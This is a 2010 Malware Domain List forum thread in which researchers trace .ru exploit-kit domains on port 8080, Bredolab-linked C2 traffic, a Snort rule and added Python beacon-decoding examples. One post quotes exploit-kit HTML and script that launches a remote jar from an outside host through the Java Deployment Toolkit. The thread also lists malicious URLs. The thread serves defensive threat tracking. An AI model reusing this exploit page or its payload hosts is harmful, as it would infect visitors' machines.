Malware Domain List

Malware Related => Malicious Domains => Topic started by: eoin.miller on May 17, 2010, 07:21:35 pm

Title: .ru domains over port 8080
Post by: eoin.miller on May 17, 2010, 07:21:35 pm
Found a few exploit kits that are all ending in .ru and running on port 8080/TCP.

188.165.61.44 - relaxedgrape.ru - 8080/TCP

Entry:
http://relaxedgrape.ru:8080/google.com/download.com/sanspo.com.php

PDF:
http://relaxedgrape.ru:8080/Notes1.pdf
http://wepawet.iseclab.org/view.php?hash=818c879f5b8bf09642cee47394ef28a4&type=js

Java:
http://relaxedgrape.ru:8080/Applet1.html

188.165.192.22 - cornerrat.ru, rarephone.ru - 8080/TCP
Entry:
http://rarephone.ru:8080/index.php?pid=7

PDF:
http://rarephone.ru:8080/Notes7.pdf

Java:
http://rarephone.ru:8080/Applet7.html

Malware/Payload:
http://cornerrat.ru:8080/welcome.php?id=6&pid=1&hello=503

174.137.179.244 - globaljoke.ru, gothguilt.ru - 8080/TCP
Malware/Payload:
http://globaljoke.ru:8080/welcome.php?id=6&pid=1&hello=503
Title: Re: .ru domains over port 8080
Post by: eoin.miller on May 17, 2010, 07:33:09 pm
188.165.192.22 - fewrocker.ru

Java:
http://fewrocker.ru:8080/Applet2.html
Title: Re: .ru domains over port 8080
Post by: philipp on May 17, 2010, 07:37:51 pm
188.165.192.22 - fewrocker.ru

Code: [Select]
200 http://fewrocker.ru:8080/
403 http://fewrocker.ru:8080/i/
403 http://fewrocker.ru:8080/22/
200 http://fewrocker.ru:8080/cache/
403 http://fewrocker.ru:8080/cgi-bin/
403 http://fewrocker.ru:8080/images/
200 http://fewrocker.ru:8080/new/
200 http://fewrocker.ru:8080/22/build.exe (MD5: 39ed2b2e25883aa21ae1dde13adf7d99)
403 http://fewrocker.ru:8080/22/33/
302 http://fewrocker.ru:8080/22/cgi-bin/
302 http://fewrocker.ru:8080/22/33/cgi-bin/
200 http://fewrocker.ru:8080/new/index.php
403 http://fewrocker.ru:8080/new/include/
200 http://fewrocker.ru:8080/new/install/
403 http://fewrocker.ru:8080/new/logs/
200 http://fewrocker.ru:8080/new/install/index.php
Title: Re: .ru domains over port 8080
Post by: eoin.miller on May 17, 2010, 07:38:53 pm
Couple more, I'll keep updating the thread as I find stuff:

greatfile.ru - 85.17.19.26
valuablemind.ru - 94.75.243.6
Title: Re: .ru domains over port 8080
Post by: eoin.miller on May 17, 2010, 07:41:55 pm
Bredolab, I take it, philipp?

Quote
BM Tx Edition
Src:http://fewrocker.ru:8080/new/
Title: Re: .ru domains over port 8080
Post by: philipp on May 17, 2010, 07:49:49 pm
Bredolab, I take it, philipp?

Quote
BM Tx Edition
Src:http://fewrocker.ru:8080/new/

BManager C&C Panel
Don't know if there is a connection to Bredolab though. I'm not up-to-date at all :D
Title: Re: .ru domains over port 8080
Post by: CkreM on May 17, 2010, 07:58:49 pm
As far as I know BM is Bredolab.
Title: Re: .ru domains over port 8080
Post by: SysAdMini on May 17, 2010, 08:01:56 pm
As far as I know BM is Bredolab.

I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.

http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc
Title: Re: .ru domains over port 8080
Post by: CkreM on May 17, 2010, 08:08:46 pm
As far as I know BM is Bredolab.

I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.

http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc

Yeah, noticed that too.
Could be a non-connected file, or even a file downloaded by Bredolab.
Title: Re: .ru domains over port 8080
Post by: philipp on May 17, 2010, 08:27:38 pm
I see the binary posting data to
Code: [Select]
http://morechord.ru/home.php
Code: [Select]
VWlkMDo6MjlERDA0QTZ+fjI5REQwNEE2YGAyOUREMDRBNg0K
which looks like it's base64 encoded.

Code: [Select]
# morechord.ru
Domain: morechord.ru
 Reg: bushy@bigmailbox.ru
IP: 217.23.7.112
 RDNS:
 ASN: 49981 (NL)
IP: 217.20.47.85
 RDNS:
 ASN: 15830 (GB)
IP: 217.11.254.41
 RDNS: assigned-217-11-254-041.casablanca.cz
 ASN: 15685 (CZ)
IP: 88.191.47.83
 RDNS: sd-7664.dedibox.fr
 ASN: 12322 (FR)
IP: 217.148.89.77
 RDNS:
 ASN: 16237 (NL)
Title: Re: .ru domains over port 8080
Post by: eoin.miller on May 17, 2010, 08:30:07 pm
As far as I know BM is Bredolab.

I agree, but these build.exe samples don't show typical Bredolab network traffic and don't connect to BM.

http://camas.comodo.com/cgi-bin/submit?file=5bba479333a5001632d8fff1827a0667e59fa6f964a6e7c543ab75d06e3c77fc

What led me to this nest of badness was a signature that fired for Bredolab from that host. One from the VRT/Sourcefire guys, the other from EmergingThreats.net; both fired on a packet from this client system.

Request:
Code: [Select]
GET /new/controller.php?action=bot&entity_list=&first=1&rnd=981633&uid=1&guid=2678185660 HTTP/1.1
Host: bayjail.ru

Signature:
Code: [Select]
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"SPECIFIC-THREATS Bredolab downloader communication with server attempt"; flow:to_server,established; uricontent:"action="; nocase; uricontent:"entity"; nocase; uricontent:"rnd="; nocase; uricontent:"uid="; nocase; uricontent:"guid="; nocase; pcre:"/uid\x3D\d/Usmi"; pcre:"/guid\x3D\d/Usmi"; pcre:"/rnd\x3D\d/smiU"; metadata:policy balanced-ips drop, policy security-ips drop; reference:url,www.threatexpert.com/report.aspx?md5=b5a530185d35ea8305d3742e2ee5669f; classtype:trojan-activity; sid:16144; rev:2;)
I looked into what else the infected client system was connected to and then looked around for more *.ru domains that people were talking to over 8080/TCP.

EDIT:

I thought bayjail.ru was already on the MDL; I guess it isn't and should be added.

Code: [Select]
#nslookup bayjail.ru

Non-authoritative answer:
Name:    bayjail.ru
Addresses:  88.191.47.83
          217.11.254.41
          217.20.47.85
          217.23.7.112
          217.148.89.77
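To show why the VRT rule above fired on the captured request, here is an added example (not code from the thread or from Sourcefire) that re-implements only the rule's URI conditions in Python: the five case-insensitive uricontent checks and the three pcre tests. The flow, port and metadata options are not modelled, and the URI string is taken from the request quoted in the post.

```python
import re

# Request URI captured in the thread (client talking to bayjail.ru on 8080/TCP).
CAPTURED_URI = ("/new/controller.php?action=bot&entity_list=&first=1"
                "&rnd=981633&uid=1&guid=2678185660")

# uricontent:"..."; nocase;  -> case-insensitive substring tests on the URI.
# Note that "uid=" is also satisfied by "guid=", so the last two overlap.
URICONTENT = ["action=", "entity", "rnd=", "uid=", "guid="]

# pcre:"/uid\x3D\d/Usmi" etc. -> \x3D is "=", "i" makes it case-insensitive,
# "U" means match the normalised URI (we pass the URI string directly).
PCRE = [re.compile(p, re.IGNORECASE) for p in (r"uid=\d", r"guid=\d", r"rnd=\d")]


def evaluate_sid16144(uri):
    """Return a dict of each URI condition in sid:16144 and whether it matched."""
    lowered = uri.lower()
    results = {f'uricontent:"{c}"': c in lowered for c in URICONTENT}
    for rx in PCRE:
        results[f"pcre:/{rx.pattern}/i"] = rx.search(uri) is not None
    return results


def sid16144_matches(uri):
    """Rule options are ANDed: the rule fires only if every condition matches."""
    return all(evaluate_sid16144(uri).values())


if __name__ == "__main__":
    for name, hit in evaluate_sid16144(CAPTURED_URI).items():
        print("HIT " if hit else "miss", name)
    print("fires on captured request:", sid16144_matches(CAPTURED_URI))
    # A URI carrying only some of the parameters does not trip the rule.
    print("fires on partial URI:", sid16144_matches("/index.php?action=view&uid=1"))
```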
Title: Re: .ru domains over port 8080
Post by: SysAdMini on May 17, 2010, 08:31:09 pm

which looks like it's base64 encoded.


Noticed this too. Decoded string looks like an id.
Code: [Select]
Uid0::29DD04A6~~29DD04A6``29DD04A6
Title: Re: .ru domains over port 8080
Post by: eoin.miller on May 17, 2010, 08:56:39 pm
Seen other infected hosts POSTing to foresaleonline.ru

Code: [Select]
#nslookup foresaleonline.ru

Non-authoritative answer:
Name:    foresaleonline.ru
Addresses:  217.11.254.41
          217.20.47.85
          217.148.89.77
          62.84.155.246
          88.191.47.83

The POST:

Code: [Select]
POST /ololo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: foresaleonline.ru
Accept: text/html
Connection: Keep-Alive
Content-Length: 173
Content-Type: multipart/form-data; boundary=----------XXXXXXXXXXXXXXXXXXXXXX
------------XXXXXXXXXXXXXXXXXXXXXX
Content-Disposition: form-data; name="data"

VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K

------------XXXXXXXXXXXXXXXXXXXXXX--
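The decoded string philipp and SysAdMini discuss above (Uid0::29DD04A6~~29DD04A6``29DD04A6) and the multipart POST captured here share one shape, so this added example (not code from the thread) pulls the "data" field out of a raw request like the one above, base64-decodes it, and checks it against that shape so the beacon can be flagged in proxy logs. The Uid/three-times-repeated-id pattern is an assumption inferred from the two samples in the thread, not a documented format, and the request below is a constructed copy of the captured POST with the User-Agent and keep-alive headers omitted.

```python
import base64
import re

# Constructed sample: the POST to foresaleonline.ru as captured in the thread,
# with line endings normalised to \n and a few headers dropped for brevity.
BOUNDARY = "----------XXXXXXXXXXXXXXXXXXXXXX"
CAPTURED_POST = (
    "POST /ololo.php HTTP/1.1\n"
    "Host: foresaleonline.ru\n"
    f"Content-Type: multipart/form-data; boundary={BOUNDARY}\n"
    "\n"
    f"--{BOUNDARY}\n"
    'Content-Disposition: form-data; name="data"\n'
    "\n"
    "VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K\n"
    "\n"
    f"--{BOUNDARY}--\n"
)

# Assumed beacon shape (inferred from the two samples): "Uid", a digit, "::",
# then one 8-hex-digit bot id repeated three times with "~~" and "``" between.
BEACON_RE = re.compile(r"^Uid(\d+)::([0-9A-F]{8})~~\2``\2\s*$")


def form_field(request, name):
    """Return the body of one multipart/form-data field from a raw HTTP request."""
    m = re.search(r"boundary=(\S+)", request)
    if not m:
        return None
    _, _, body = request.partition("\n\n")          # skip the header block
    for part in body.split("--" + m.group(1)):
        if f'name="{name}"' in part:
            return part.split("\n\n", 1)[1].strip()  # text after the part headers
    return None


def decode_beacon(b64):
    """Return (label, bot_id) if b64 decodes to the Uid0::X~~X``X beacon, else None."""
    try:
        text = base64.b64decode(b64, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    m = BEACON_RE.match(text)
    return (int(m.group(1)), m.group(2)) if m else None


def classify_post(request):
    """Decode the 'data' field of a captured POST; None if it is not this beacon."""
    field = form_field(request, "data")
    return decode_beacon(field) if field else None


if __name__ == "__main__":
    print(classify_post(CAPTURED_POST))
    print(decode_beacon("VWlkMDo6MjlERDA0QTZ+fjI5REQwNEE2YGAyOUREMDRBNg0K"))  # morechord.ru sample
```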
Title: Re: .ru domains over port 8080
Post by: CkreM on May 17, 2010, 09:00:43 pm
Seen other infected hosts POSTing to foresaleonline.ru

Code: [Select]
#nslookup foresaleonline.ru
Server:  krusty.eid.doi.gov
Address:  10.10.2.3

Non-authoritative answer:
Name:    foresaleonline.ru
Addresses:  217.11.254.41
          217.20.47.85
          217.148.89.77
          62.84.155.246
          88.191.47.83

The POST:

Code: [Select]
POST /ololo.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en)
Host: foresaleonline.ru
Accept: text/html
Connection: Keep-Alive
Content-Length: 173
Content-Type: multipart/form-data; boundary=----------XXXXXXXXXXXXXXXXXXXXXX
------------XXXXXXXXXXXXXXXXXXXXXX
Content-Disposition: form-data; name="data"

VWlkMDo6MkVERDA0QTh+fjJFREQwNEE4YGAyRUREMDRBOA0K

------------XXXXXXXXXXXXXXXXXXXXXX--

Looks like an FTP stealer.
Title: Re: .ru domains over port 8080
Post by: matt on May 17, 2010, 09:04:24 pm
I'm not sure if these domains are on the mdl, but I've seen hits on identical activity out of these domains with the associated dates if this helps the cause:

flowdisappear.ru / 82.211.7.32 (4/29)
passportblues.ru / 62.67.246.113 (5/5 + 5/12)
gigafleet.ru / 62.193.208.175 (5/6)
gothguilt.ru / 93.89.80.117 (5/13)
??? / 85.17.137.40 (5/15) # didn't capture the URL in this request, but fits the profile.
valuablemind.ru / 85.17.19.26 (5/17)

All of the requests are similar:

Code: [Select]
<html><head><title>Bob's Homepage</title></head><body><applet width='100%' height='100%' code='iPhoneBook' archive='Games.jar'><param name='site' VALUE='Njg3NDc0NzAzQTJGMkY2NzZGNzQ2ODY3NzU2OTZDNzQyRTcyNzUzQTM4MzAzODMwMkY3NzY1NkM2MzZGNkQ2NTJFNzA2ODcwM0Y2OTY0M0QzMTMxMjY3MDY5NjQzRDMxMjYzMTNEMzEyNjY0'></applet><applet code='sunny.Changes.class' archive='NewGames.jar' width='254' height='186'><param name='data' VALUE='http://gothguilt.ru:8080/welcome.php?id=9&pid=1&1=1'><param name='cc' value='1'></applet><script>
        var u = "http: -J-jar -J\\\\78.26.127.127\\public\\001.jar none";

        if (window.navigator.appName == "Microsoft Internet Explorer") {
            var o = document.createElement("OBJECT");
            o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA";
            o.launch(u);
        } else {
            var o = document.createElement("OBJECT");
            var n = document.createElement("OBJECT");

            o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit";
            n.type = "application/java-deployment-toolkit";
            document.body.appendChild(o);
            document.body.appendChild(n);


Title: Re: .ru domains over port 8080
Post by: SysAdMini on May 17, 2010, 10:05:13 pm
www.malc0de.com posted on Twitter a list of domains being used for that campaign.

Title: Re: .ru domains over port 8080
Post by: Kimberly on May 18, 2010, 03:06:34 am
it's Gumblar ;) en.wikipedia.org/wiki/Gumblar

Got them last week already; injected obfuscated script in a Glype proxy.

Title: Re: .ru domains over port 8080
Post by: SysAdMini on May 19, 2010, 03:32:48 am
Listed by malc0de.

http://malc0de.com/database/index.php?search=.ru%3A8080